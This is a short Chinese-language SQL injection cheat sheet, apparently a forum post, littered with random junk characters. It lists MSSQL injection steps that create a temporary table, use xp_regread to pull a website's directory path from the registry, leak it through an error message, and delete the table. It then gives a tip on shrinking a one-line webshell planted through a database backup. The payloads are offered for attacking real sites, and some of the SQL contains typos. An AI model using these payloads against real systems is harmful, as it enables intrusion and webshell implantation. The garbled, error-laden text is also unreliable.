1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表
% O. }7 c: \$ l% i8 M0 @3 {7 f- }1 o
7 `3 X/ `; o: \: f
' X9 p0 Y- g8 I+ E1 Z9 N 2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中8 x! @& ^8 {/ P
# i; N, o* p: U) Y! u/ E r" U
: A( { j0 k' G2 m+ R4 \ 3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段, S, F9 N P6 W
0 f: O( V6 ?/ a& X3 |8 W+ G7 E& Q" {3 {5 [# @4 s, t7 G( H% x
4、drop table [jm_tmp]-- 删除此表。+ |) f, U/ u+ K2 z. R& T
, L7 X2 v8 ` U. a
4 p+ A' [# @6 w3 R" {9 H另附上备分专用一句话
1 q( E+ `/ |' s+ ` 加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
7 d. K. h1 s8 }" h$ ]3 |' k |